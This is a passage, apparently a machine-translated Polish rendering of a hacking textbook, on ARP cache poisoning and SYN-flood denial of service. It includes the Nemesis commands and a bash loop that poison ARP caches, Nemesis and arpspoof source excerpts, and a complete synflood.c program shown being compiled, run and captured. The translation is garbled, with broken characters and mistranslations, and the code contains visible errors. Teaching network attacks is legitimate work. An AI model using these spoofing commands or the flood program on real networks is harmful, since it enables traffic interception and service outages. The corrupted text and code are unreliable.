ograniczony przez adres MAC. Oznacza to, �e ten ruch nie mo�e by� normalnie wykrywany, nawet w trybie mieszanym. Aby pow�cha� ten ruch, nale�y go przekierowa�. Aby przekierowa� ruch, najpierw nale�y okre�li� adresy MAC 192.168.0.118 i 192.168.0.1. Mo�na tego dokona�, wysy�aj�c polecenie ping do tych host�w, poniewa� ka�da pr�ba po��czenia IP b�dzie korzysta� z ARP. Je�li uruchamiasz sniffer, mo�esz zobaczy� komunikacj� ARP, ale system operacyjny buforuje wynikaj�ce st�d po��czenia adresu IP / MAC

reader@hacking:~/booksrc $ ping -c 1 -w 1 192.168.0.1

PING 192.168.0.1 (192.168.0.1): 56 octets data

64 octets from 192.168.0.1: icmp_seq=0 ttl=64 time=0.4 ms

--- 192.168.0.1 ping statistics ---

1 packets transmitted, 1 packets received, 0% packet loss

round-trip min/avg/max = 0.4/0.4/0.4 ms

reader@hacking:~/booksrc $ ping -c 1 -w 1 192.168.0.118

PING 192.168.0.118 (192.168.0.118): 56 octets data

64 octets from 192.168.0.118: icmp_seq=0 ttl=128 time=0.4 ms

--- 192.168.0.118 ping statistics ---

1 packets transmitted, 1 packets received, 0% packet loss

round-trip min/avg/max = 0.4/0.4/0.4 ms

reader@hacking:~/booksrc $ arp -na

? (192.168.0.1) at 00:50:18:00:0F:01 [ether] on eth0

? (192.168.0.118) at 00:C0:F0:79:3D:30 [ether] on eth0

reader@hacking:~/booksrc $ ifconfig eth0

eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED

inet addr:192.168.0.193 Bcast:192.168.0.255 Mask:255.255.255.0

UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1

RX packets:4153 errors:0 dropped:0 overruns:0 frame:0

TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

RX bytes:601686 (587.5 Kb) TX bytes:288567 (281.8 Kb)

Interrupt:9 Base address:0xc000

reader@hacking:~/booksrc $

Po wykonaniu pingowania adresy MAC 192.168.0.118 i 192.168.0.1 znajduj� si� w pami�ci podr�cznej ARP atakuj�cego. W ten spos�b pakiety mog� dotrze� do ostatecznych cel�w po przekierowaniu na maszyn� atakuj�cego. Zak�adaj�c, �e mo�liwo�ci przekierowania IP s� wkompilowane w j�dro, wszystko co musimy zrobi�, to wys�a� kilka fa�szywych odpowiedzi ARP w regularnych odst�pach czasu. 192.168.0.118 nale�y poinformowa�, �e 192.168.0.1 jest o 00: 00: AD: D1: C7: ED, a 192.168.0.1 nale�y poinformowa�, �e 192.168.0.118 jest r�wnie� o 00: 00: AD: D1: C7: ED. Te sfa�szowane pakiety ARP mo�na wstrzykiwa� za pomoc� narz�dzia do iniekcji pakiet�w uruchamianego z wiersza polece� o nazwie Nemesis. Nemesis by� pierwotnie zestawem narz�dzi napisanych przez Mark Grimes, ale w najnowszej wersji 1.4, wszystkie funkcje zosta�y zrolowane w jedno narz�dzie przez nowego opiekuna i programist�, Jeffa Nathana. Kod �r�d�owy dla Nemesis znajduje si� na LiveCD w / usr / src / nemesis- 1.4 / i zosta� ju� zbudowany i zainstalowany.

reader@hacking:~/booksrc $ nemesis

NEMESIS -=- The NEMESIS Project Version 1.4 (Build 26)

NEMESIS Usage:

nemesis [mode] [options]

NEMESIS modes:

arp

dns

ethernet

icmp

igmp

ip

ospf (currently non-functional)

rip

tcp

udp

NEMESIS options:

To display options, specify a mode with the option "help".

reader@hacking:~/booksrc $ nemesis arp help

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

ARP/RARP Usage:

arp [-v (verbose)] [options]

ARP/RARP Options:

-S < Source IP address >

-D < Destination IP address >

-h < Sender MAC address within ARP frame >

-m < Target MAC address within ARP frame >

-s < Solaris style ARP requests with target hardware addess set to broadcast >

-r ({ARP,RARP} REPLY enable)

-R (RARP enable)

-P < Payload file >

Data Link Options:

-d < Ethernet device name >

-H < Source MAC address >

-M < Destination MAC address >

You must define a Source and Destination IP address.

reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192.168.0.1 -D

192.168.0.118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -

M 00:C0:F0:79:3D:30

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30

[Ethernet type] ARP (0x0806)

[Protocol addr:IP] 192.168.0.1 > 192.168.0.118

[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30

[ARP opcode] Reply

[ARP hardware fmt] Ethernet (1)

[ARP proto format] IP (0x0800)

[ARP protocol len] 6

[ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB

ARP Packet Injected

reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192.168.0.118 -D

192.168.0.1 -h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M

00:50:18:00:0F:01

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01

[Ethernet type] ARP (0x0806)

[Protocol addr:IP] 192.168.0.118 > 192.168.0.1

[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01

[ARP opcode] Reply

[ARP hardware fmt] Ethernet (1)

[ARP proto format] IP (0x0800)

[ARP protocol len] 6

[ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected

reader@hacking:~/booksrc $

Te dwie komendy podszywaj� odpowiedzi ARP od 192.168.0.1 do 192.168.0.118 i na odwr�t, obie twierdz�, �e ich adres MAC znajduje si� na adresie MAC atakuj�cego, 00: 00: AD: D1: C7: ED. Je�li te polecenia b�d� powtarzane co 10 sekund, te fa�szywe odpowiedzi ARP b�d� nadal powodowa� zatajanie pami�ci podr�cznych ARP i przekierowanie ruchu. Standardowa pow�oka BASH pozwala na wykonywanie skrypt�w za pomoc� znanych instrukcji sterowania przep�ywem. Prosta pow�oka BASH, podczas gdy p�tla jest u�ywana poni�ej do p�tli na zawsze, wysy�aj�c nasze dwie zatruwaj�ce odpowiedzi ARP co 10 sekund.

reader@hacking:~/booksrc $ while true

> do

> sudo nemesis arp -v -r -d eth0 -S 192.168.0.1 -D 192.168.0.118 -h

00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M

00:C0:F0:79:3D:30

> sudo nemesis arp -v -r -d eth0 -S 192.168.0.118 -D 192.168.0.1 -h

00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M

00:50:18:00:0F:01

> echo "Redirecting..."

> sleep 10

> done

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30

[Ethernet type] ARP (0x0806)

[Protocol addr:IP] 192.168.0.1 > 192.168.0.118

[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30

[ARP opcode] Reply

[ARP hardware fmt] Ethernet (1)

[ARP proto format] IP (0x0800)

[ARP protocol len] 6

[ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01

[Ethernet type] ARP (0x0806)

[Protocol addr:IP] 192.168.0.118 > 192.168.0.1

[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01

[ARP opcode] Reply

[ARP hardware fmt] Ethernet (1)

[ARP proto format] IP (0x0800)

[ARP protocol len] 6

[ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected

Redirecting...

Mo�esz zobaczy�, jak co� tak prostego jak Nemesis i standardowa pow�oka BASH mo�e by� u�yta do szybkiego zhackowania exploita sieciowego. Nemesis u�ywa biblioteki C zwanej libnet do tworzenia fa�szywych pakiet�w i wstrzykiwania ich. Podobnie jak biblioteka libpcap, biblioteka ta wykorzystuje surowe gniazda i wyr�wnuje niesp�jno�ci mi�dzy platformami ze standardowym interfejsem. libnet zapewnia r�wnie� kilka wygodnych funkcji do obs�ugi pakiet�w sieciowych, takich jak generowanie sum kontrolnych. Biblioteka libnet zapewnia prosty i jednolity interfejs API do tworzenia i wstrzykiwania pakiet�w sieciowych. Jest dobrze udokumentowany, a funkcje maj� opisowe nazwy. Rzut oka na kod �r�d�owy Nemezis pokazuje, jak �atwo jest tworzy� pakiety ARP za pomoc� libnet. Plik �r�d�owy nemesis-arp.c zawiera kilka funkcji do wytwarzania i wstrzykiwania pakiet�w ARP, wykorzystuj�c statycznie zdefiniowane struktury danych dla informacji nag��wka pakietu. Funkcja nemesis_arp () pokazana poni�ej jest wywo�ywana w nemesis.c w celu zbudowania i wstrzykni�cia pakietu ARP.

Od nemesis-arp.c

static ETHERhdr etherhdr;

static ARPhdr arphdr;

...

void nemesis_arp(int argc, char **argv)

{

const char *module= "ARP/RARP Packet Injection";

nemesis_maketitle(title, module, version);

if (argc > 1 && !strncmp(argv[1], "help", 4))

arp_usage(argv[0]);

arp_initdata();

arp_cmdline(argc, argv);

arp_validatedata();

arp_verbose();

if (got_payload)

{

if (builddatafromfile(ARPBUFFSIZE, &pd, (const char *)file,

(const u_int32_t)PAYLOADMODE) < 0)

arp_exit(1);

}

if (buildarp(ðerhdr, &arphdr, &pd, device, reply) < 0)

{

printf("\n%s Injection Failure\n", (rarp == 0 ? "ARP" : "RARP"));

arp_exit(1);

}

else

{

printf("\n%s Packet Injected\n", (rarp == 0 ? "ARP" : "RARP"));

arp_exit(0);

}

}

Struktury ETHERhdr i ARPhdr s� zdefiniowane w pliku nemesis.h (pokazanym poni�ej) jako aliasy dla istniej�cej struktury danych libnet. W C, typedef jest u�ywany do alias�w typu danych z symbolem

nemesis.h

typedef struct libnet_arp_hdr ARPhdr;

typedef struct libnet_as_lsa_hdr ASLSAhdr;

typedef struct libnet_auth_hdr AUTHhdr;

typedef struct libnet_dbd_hdr DBDhdr;

typedef struct libnet_dns_hdr DNShdr;

typedef struct libnet_ethernet_hdr ETHERhdr;

typedef struct libnet_icmp_hdr ICMPhdr;

typedef struct libnet_igmp_hdr IGMPhdr;

typedef struct libnet_ip_hdr IPhdr;

Funkcja nemesis_arp () wywo�uje seri� innych funkcji z tego pliku: arp_initdata (), arp_cmdline (), arp_validatedata () i arp_verbose (). Prawdopodobnie mo�esz odgadn��, �e te funkcje inicjuj� dane, przetwarzaj� argumenty wiersza polece�, sprawdzaj� poprawno�� danych i sporz�dzaj� szczeg�owe raporty. Funkcja arp_initdata () robi dok�adnie to, inicjuj�c warto�ci w statycznie zadeklarowanych strukturach danych. Przedstawiona poni�ej funkcja arp_initdata () ustawia r�ne elementy struktur nag��wka na odpowiednie warto�ci dla pakietu ARP.

Od nemesis-arp.c

static void arp_initdata(void)

{

/* defaults */

etherhdr.ether_type = ETHERTYPE_ARP; /* Ethernet type ARP */

memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */

memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */

arphdr.ar_op = ARPOP_REQUEST; /* ARP opcode: request */

arphdr.ar_hrd = ARPHRD_ETHER; /* hardware format: Ethernet */

arphdr.ar_pro = ETHERTYPE_IP; /* protocol format: IP */

arphdr.ar_hln = 6; /* 6 byte hardware addresses */

arphdr.ar_pln = 4; /* 4 byte protocol addresses */

memset(arphdr.ar_sha, 0, 6); /* ARP frame sender address */

memset(arphdr.ar_spa, 0, 4); /* ARP sender protocol (IP) addr */

memset(arphdr.ar_tha, 0, 6); /* ARP frame target address */

memset(arphdr.ar_tpa, 0, 4); /* ARP target protocol (IP) addr */

pd.file_mem = NULL;

pd.file_s = 0;

return;

}

Wreszcie, funkcja nemesis_arp () wywo�uje funkcj� buildarp () ze wska�nikami do struktur danych nag��wka. S�dz�c po sposobie obs�ugi warto�ci zwracanej przez buildarp (), buildarp () buduje pakiet i wstrzykuje go. Ta funkcja znajduje si� w jeszcze innym pliku �r�d�owym, nemesis-proto_arp.c.

nemesis-proto_arp.c

int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char *device,

int reply)

{

int n = 0;

u_int32_t arp_packetlen;

static u_int8_t *pkt;

struct libnet_link_int *l2 = NULL;

/* validation tests */

if (pd->file_mem == NULL)

pd->file_s = 0;

arp_packetlen = LIBNET_ARP_H + LIBNET_ETH_H + pd->file_s;

#ifdef DEBUG

printf("DEBUG: ARP packet length %u.\n", arp_packetlen);

printf("DEBUG: ARP payload size %u.\n", pd->file_s);

#endif

if ((l2 = libnet_open_link_interface(device, errbuf) ) == NULL)

{

nemesis_device_failure(INJECTION_LINK, (const char *)device);

return -1;

}

if (libnet_init_packet(arp_packetlen, &pkt) == -1)

{

fprintf(stderr, "ERROR: Unable to allocate packet memory.\n"); return -1;

}

libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, eth->ether_type,

NULL, 0, pkt);

libnet_build_arp(arp->ar_hrd, arp->ar_pro, arp->ar_hln, arp->ar_pln,

arp->ar_op, arp->ar_sha, arp->ar_spa, arp->ar_tha, arp->ar_tpa,

pd->file_mem, pd->file_s, pkt + LIBNET_ETH_H);

n = libnet_write_link_layer(l2, device, pkt, LIBNET_ETH_H +

LIBNET_ARP_H + pd->file_s);

if (verbose == 2)

nemesis_hexdump(pkt, arp_packetlen, HEX_ASCII_DECODE);

if (verbose == 3)

nemesis_hexdump(pkt, arp_packetlen, HEX_RAW_DECODE);

if (n != arp_packetlen)

{

fprintf(stderr, "ERROR: Incomplete packet injection. Only "

"wrote %d bytes.\n", n);

}

else

{

if (verbose)

{

if (memcmp(eth->ether_dhost, (void *)&one, 6))

{

printf("Wrote %d byte unicast ARP request packet through "

"linktype %s.\n", n,

nemesis_lookup_linktype(l2->linktype));

}

else

{

printf("Wrote %d byte %s packet through linktype %s.\n", n,

(eth->ether_type == ETHERTYPE_ARP ? "ARP" : "RARP"),

nemesis_lookup_linktype(l2->linktype));

}

}

}

libnet_destroy_packet(&pkt);

if (l2 != NULL)

libnet_close_link_interface(l2);

return (n);

}

Na wysokim poziomie ta funkcja powinna by� czytelna dla Ciebie. U�ywaj�c funkcji libnet, otwiera interfejs ��cza i inicjalizuje pami�� dla pakietu. Nast�pnie tworzy warstw� Ethernet za pomoc� element�w ze struktury danych nag��wka Ethernet, a nast�pnie robi to samo dla warstwy ARP. Nast�pnie zapisuje pakiet do urz�dzenia, aby go wstrzykn��, a na koniec czy�ci, niszcz�c pakiet i zamykaj�c interfejs. Dokumentacja tych funkcji ze strony podr�cznika man jest pokazana poni�ej dla jasno�ci.

libnet Man Page

libnet_open_link_interface() opens a low-level packet interface. This is

required to write link layer frames. Supplied is a u_char pointer to the

interface device name and a u_char pointer to an error buffer. Returned is a

filled in libnet_link_int struct or NULL on error.

libnet_init_packet() initializes a packet for use. If the size parameter is

omitted (or negative) the library will pick a reasonable value for the user

(currently LIBNET_MAX_PACKET). If the memory allocation is successful, the

memory is zeroed and the function returns 1. If there is an error, the

function returns -1. Since this function calls malloc, you certainly should,

at some point, make a corresponding call to destroy_packet().

libnet_build_ethernet() constructs an ethernet packet. Supplied is the

destination address, source address (as arrays of unsigned characterbytes)

and the ethernet frame type, a pointer to an optional data payload, the

payload length, and a pointer to a pre-allocated block of memory for the

packet. The ethernet packet type should be one of the following:

Value Type

ETHERTYPE_PUP PUP protocol

ETHERTYPE_IP IP protocol

ETHERTYPE_ARP ARP protocol

ETHERTYPE_REVARP Reverse ARP protocol

ETHERTYPE_VLAN IEEE VLAN tagging

ETHERTYPE_LOOPBACK Used to test interfaces

libnet_build_arp() constructs an ARP (Address Resolution Protocol) packet.

Supplied are the following: hardware address type, protocol address type, the

hardware address length, the protocol address length, the ARP packet type, the

sender hardware address, the sender protocol address, the target hardware

address, the target protocol address, the packet payload, the payload size,

and finally, a pointer to the packet header memory. Note that this function

only builds ethernet/IP ARP packets, and consequently the first value should

be ARPHRD_ETHER. The ARP packet type should be one of the following:

ARPOP_REQUEST, ARPOP_REPLY, ARPOP_REVREQUEST, ARPOP_REVREPLY,

ARPOP_INVREQUEST, or ARPOP_INVREPLY.

libnet_destroy_packet() frees the memory associated with the packet.

ibnet_close_link_interface () zamyka otwarty interfejs pakiet�w niskiego poziomu.

Zwr�cono 1 po sukcesie lub -1 przy b��dzie. Dzi�ki podstawowemu rozumieniu dokumentacji C, API i zdrowego rozs�dku mo�esz uczy� si� samodzielnie, badaj�c projekty open source. Na przyk�ad, Dug Song udost�pnia program o nazwie arpspoof, do��czony do dsniff, kt�ry wykonuje atak przekierowania ARP. arpspoof Man Page

NAME

arpspoof - intercept packets on a switched LAN

SYNOPSIS

arpspoof [-i interface] [-t target] host

DESCRIPTION

arpspoof redirects packets from a target host (or all hosts) on the LAN

intended for another host on the LAN by forging ARP replies. This is

an extremely effective way of sniffing traffic on a switch.

Kernel IP forwarding (or a userland program which accomplishes the

same, e.g. fragrouter(8)) must be turned on ahead of time.

OPTIONS

-i interface

Specify the interface to use.

-t target

Specify a particular host to ARP poison (if not specified, all

hosts on the LAN).

host Specify the host you wish to intercept packets for (usually the

local gateway).

SEE ALSO

dsniff(8), fragrouter(8)

AUTHOR

Dug Song < dugsong@monkey.org >

Magia tego programu wywodzi si� z jego funkcji arp_send (), kt�ra r�wnie� u�ywa libnet do parodowania pakiet�w. Kod �r�d�owy tej funkcji powinien by� czytelny dla ciebie, poniewa� u�yto wielu z poprzednio obja�nionych funkcji libnet (pogrubione poni�ej). Zastosowanie struktur i bufora b��d�w r�wnie� powinno by� znane.4.4.4.7. arpspoof.c

static struct libnet_link_int *llif;

static struct ether_addr spoof_mac, target_mac;

static in_addr_t spoof_ip, target_ip;

...

int

arp_send(struct libnet_link_int *llif, char *dev,

int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa)

{

char ebuf[128];

u_char pkt[60];

if (sha == NULL &&

(sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {

return (-1);

}

if (spa == 0) {

if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)

return (-1);

spa = htonl(spa); /* XXX */

}

if (tha == NULL)

tha = "\xff\xff\xff\xff\xff\xff";

libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);

libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,

op, sha, (u_char *)&spa, tha, (u_char *)&tpa,

NULL, 0, pkt + ETH_H);

fprintf(stderr, "%s ",

ether_ntoa((struct ether_addr *)sha));

if (op == ARPOP_REQUEST) {

fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",

ether_ntoa((struct ether_addr *)tha),

libnet_host_lookup(tpa, 0),

libnet_host_lookup(spa, 0));

}

else {

fprintf(stderr, "%s 0806 42: arp reply %s is-at ",

ether_ntoa((struct ether_addr *)tha),

libnet_host_lookup(spa, 0));

fprintf(stderr, "%s\n",

ether_ntoa((struct ether_addr *)sha));

}

return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt));

}

Pozosta�e funkcje libnet pobieraj� adresy sprz�towe, pobieraj� adres IP i wyszukuj� hosty. Funkcje te maj� opisowe nazwy i s� szczeg�owo obja�nione na stronie podr�cznika libnet.

libnet Man Page

libnet_get_hwaddr() takes a pointer to a link layer interface struct, a

pointer to the network device name, and an empty buffer to be used in case of

error. The function returns the MAC address of the specified interface upon

success or 0 upon error (and errbuf will contain a reason).

libnet_get_ipaddr() takes a pointer to a link layer interface struct, a

pointer to the network device name, and an empty buffer to be used in case of

error. Upon success the function returns the IP address of the specified

interface in host-byte order or 0 upon error (and errbuf will contain a

reason).

libnet_host_lookup() converts the supplied network-ordered (big-endian) IPv4

address into its human-readable counterpart. If use_name is 1,

libnet_host_lookup() will attempt to resolve this IP address and return a hostname, otherwise (or if the lookup fails), the function returns a dotteddecimal ASCII string. Gdy nauczysz si� czyta� kod C, istniej�ce programy mog� Ci� wiele nauczy�. Biblioteki programistyczne takie jak libnet i libpcap zawieraj� mn�stwo dokumentacji, kt�ra wyja�nia wszystkie szczeg�y, kt�rych mo�e nie by� w stanie odgadn�� z samego �r�d�a. Celem jest nauczenie ci�, jak uczy� si� z kodu �r�d�owego, a nie tylko nauczy� si� korzysta� z kilku bibliotek. W ko�cu istnieje wiele innych bibliotek i wiele istniej�cego kodu �r�d�owego, kt�ry je wykorzystuje.

Powr�t

17.08.2020

Denial of Service

Jedn� z najprostszych form ataku sieciowego jest atak Denial of Service (DoS). Zamiast pr�bowa� wykra�� informacje, atak DoS po prostu uniemo�liwia dost�p do us�ugi lub zasobu. Istniej� dwie og�lne formy atak�w typu DoS: te, kt�re powoduj� awari� us�ug i te, kt�re powoduj� zalanie us�ug. Ataki Denial of Service, kt�re powoduj� awarie, s� bardziej podobne do exploit�w programowych ni� sieciowych exploit�w. Cz�sto ataki te zale�� od s�abej implementacji przez okre�lonego dostawc�. Przepe�nienie bufora, kt�re przepad�o, zazwyczaj powoduje awari� programu docelowego, zamiast kierowa� strumie� wykonania do wstrzykiwanego kodu pow�oki. Je�li ten program znajduje si� na serwerze, nikt inny nie mo�e uzyska� dost�pu do tego serwera po awarii. Ataki typu DoS powoduj�ce takie ataki s� �ci�le powi�zane z pewnym programem i pewn� wersj�. Poniewa� system operacyjny obs�uguje stos sieciowy, awaria w tym kodzie spowoduje usuni�cie j�dra, odmawiaj�c us�ugi ca�ej maszynie. Wiele z tych luk ju� dawno zosta�o za�atanych na nowoczesnych systemach operacyjnych, ale nadal warto zastanowi� si�, w jaki spos�b mo�na zastosowa� te techniki w r�nych sytuacjach.

Powr�t

18.08.2020

SYN Flooding

Pow�d� SYN pr�buje wy�adowa� stany w stosie TCP / IP. Poniewa� TCP utrzymuje "niezawodne" po��czenia, ka�de po��czenie musi by� gdzie� �ledzone. Stos TCP / IP w j�drze obs�uguje to, ale ma sko�czon� tabel�, kt�ra mo�e �ledzi� tylko tyle po��cze� przychodz�cych. Pow�d� SYN wykorzystuje podszywanie si�, aby skorzysta� z tego ograniczenia. Atakuj�cy zalewa system ofiary wieloma pakietami SYN, u�ywaj�c fa�szywego nieistniej�cego adresu �r�d�owego. Poniewa� pakiet SYN jest u�ywany do zainicjowania po��czenia TCP, komputer ofiary wy�le pakiet SYN / ACK na podany adres w odpowiedzi i czeka na oczekiwan� odpowied� ACK. Ka�de z tych oczekuj�cych, p�otwartych po��cze� przechodzi do kolejki zaleg�o�ci, kt�ra ma ograniczon� przestrze�. Poniewa� sfa�szowane adresy �r�d�owe w rzeczywisto�ci nie istniej�, odpowiedzi ACK s� potrzebne, aby usun�� te wpisy z kolejki i zako�czy� po��czenia nigdy chod�. Zamiast tego ka�de p�-otwarte po��czenie musi up�yn��, co zajmuje stosunkowo du�o czasu. Dop�ki atakuj�cy nadal zaleje system ofiary fa�szywymi pakietami SYN, kolejka zalegania ofiary pozostanie pe�na, przez co rzeczywiste pakiety SYN b�d� mog�y dosta� si� do systemu i zainicjowa� poprawne po��czenia TCP / IP. U�ywaj�c kodu �r�d�owego Nemesis i arpspoof jako odniesienia, powiniene� by� w stanie napisa� program, kt�ry wykona ten atak. Poni�szy przyk�adowy program korzysta z funkcji pobierania danych pobranych z kodu �r�d�owego i funkcji gniazd opisanych wcze�niej. Kod �r�d�owy Nemesis wykorzystuje funkcj� libnet_get_prand () w celu uzyskania liczb pseudolosowych dla r�nych p�l IP. Funkcja libnet_seed_prand () jest u�ywana do inicjowania randomizera. Te funkcje s� podobnie u�ywane poni�ej.

synflood.c

#include < libnet.h >

#define FLOOD_DELAY 5000 // Delay between packet injects by 5000 ms.

/* Returns an IP in x.x.x.x notation */

char *print_ip(u_long *ip_addr_ptr) {

return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );

}

int main(int argc, char *argv[]) {

u_long dest_ip;

u_short dest_port;

u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;

int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

if(argc < 3)

{

printf("Usage:\n%s\t < target host > < target port >\n", argv[0]);

exit(1);

}

dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // The host

dest_port = (u_short) atoi(argv[2]); // The port

network = libnet_open_raw_sock(IPPROTO_RAW); // Open network interface.

if (network == -1)

libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program

must run

as root.\n");

libnet_init_packet(packet_size, &packet); // Allocate memory for packet.

if (packet == NULL)

libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

libnet_seed_prand(); // Seed the random number generator.

printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));

while(1) // loop forever (until break by CTRL-C)

{

libnet_build_ip(LIBNET_TCP_H, // Size of the packet sans IP header.

IPTOS_LOWDELAY, // IP tos

libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)

0, // Frag stuff

libnet_get_prand(LIBNET_PR8), // TTL (randomized)

IPPROTO_TCP, // Transport protocol

libnet_get_prand(LIBNET_PRu32), // Source IP (randomized)

dest_ip, // Destination IP

NULL, // Payload (none)

0, // Payload length

packet); // Packet header memory

libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // Source TCP port (random)

dest_port, // Destination TCP port

libnet_get_prand(LIBNET_PRu32), // Sequence number (randomized)

libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)

TH_SYN, // Control flags (SYN flag set only)

libnet_get_prand(LIBNET_PRu16), // Window size (randomized)

0, // Urgent pointer

NULL, // Payload (none)

0, // Payload length

packet + LIBNET_IP_H); // Packet header memory

if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)

libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

byte_count = libnet_write_ip(network, packet, packet_size); // Inject packet.

if (byte_count < packet_size)

libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d v bytes)", byte_count, packet_size);

usleep(FLOOD_DELAY); // Wait for FLOOD_DELAY milliseconds.

libnet_destroy_packet(&packet); // Free packet memory.

if (libnet_close_raw_sock(network) == -1) // Close the network interface.

libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");

return 0;

}

Ten program u�ywa funkcji print_ip () do obs�ugi konwersji typu u_long, u�ywanego przez libnet do przechowywania adres�w IP, do typu struktury oczekiwanego przez inet_ntoa (). Warto�� si� nie zmienia - kr�j typowania tylko komplikuje. Obecna wersja libnet jest w wersji 1.1, kt�ra jest niekompatybilna z libnet 1.0. Jednak Nemesis i arpspoof wci�� opieraj� si� na 1.0 wersji libnet, wi�c ta wersja jest zawarta w LiveCD i jest to r�wnie� to, czego u�yjemy w naszym programie synflood. Podobnie do kompilacji z libpcap, podczas kompilacji z libnet u�ywana jest flaga -lnet. Jednak nie jest to wystarczaj�ca ilo�� informacji dla kompilatora, jak pokazuje poni�szy wynik.

reader@hacking:~/booksrc $ gcc -o synflood synflood.c -lnet

In file included from synflood.c:1:

/usr/include/libnet.h:87:2: #error "byte order has not been specified, you'll"

synflood.c:6: error: syntax error before string constant

reader@hacking:~/booksrc $

Kompilator wci�� nie dzia�a, poniewa� nale�y ustawi� kilka obowi�zkowych flag definicji dla biblioteki libnet. W zestawie z libnet, program o nazwie libnet-config wy�wietli te flagi.

reader@hacking:~/booksrc $ libnet-config --help

Usage: libnet-config [OPTIONS]

Options:

[--libs]

[--cflags]

[--defines]

reader@hacking:~/booksrc $ libnet-config --defines

-D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H

-DLIBNET_LIL_ENDIAN

Using the BASH shell's command substitution in both, these defines can be dynamically inserted into the

compile command.

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o synflood

synflood.c -lnet

reader@hacking:~/booksrc $ ./synflood

Usage:

./synflood < target host > < target port >

reader@hacking:~/booksrc $

reader@hacking:~/booksrc $ ./synflood 192.168.42.88 22

Fatal: can't open network interface. -- this program must run as root.

reader@hacking:~/booksrc $ sudo ./synflood 192.168.42.88 22

SYN Flooding port 22 of 192.168.42.88..

W powy�szym przyk�adzie host 192.168.42.88 jest komputerem z systemem Windows XP, na kt�rym dzia�a serwer openssh na porcie 22 przez cygwin. Poni�sze wyj�cie tcpdump pokazuje sfa�szowane pakiety SYN zalewaj�ce hosta od pozornie losowych adres�w IP. Podczas dzia�ania programu nie mo�na nawi�zywa� poprawnych po��cze� z tym portem.

reader@hacking:~/booksrc $ sudo tcpdump -i eth0 -nl -c 15 "host 192.168.42.88"

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

17:08:16.334498 IP 121.213.150.59.4584 > 192.168.42.88.22: S

751659999:751659999(0) win 14609

17:08:16.346907 IP 158.78.184.110.40565 > 192.168.42.88.22: S

139725579:139725579(0) win 64357

17:08:16.358491 IP 53.245.19.50.36638 > 192.168.42.88.22: S

322318966:322318966(0) win 43747

17:08:16.370492 IP 91.109.238.11.4814 > 192.168.42.88.22: S

685911671:685911671(0) win 62957

17:08:16.382492 IP 52.132.214.97.45099 > 192.168.42.88.22: S

71363071:71363071(0) win 30490

17:08:16.394909 IP 120.112.199.34.19452 > 192.168.42.88.22: S

1420507902:1420507902(0) win 53397

17:08:16.406491 IP 60.9.221.120.21573 > 192.168.42.88.22: S

2144342837:2144342837(0) win 10594

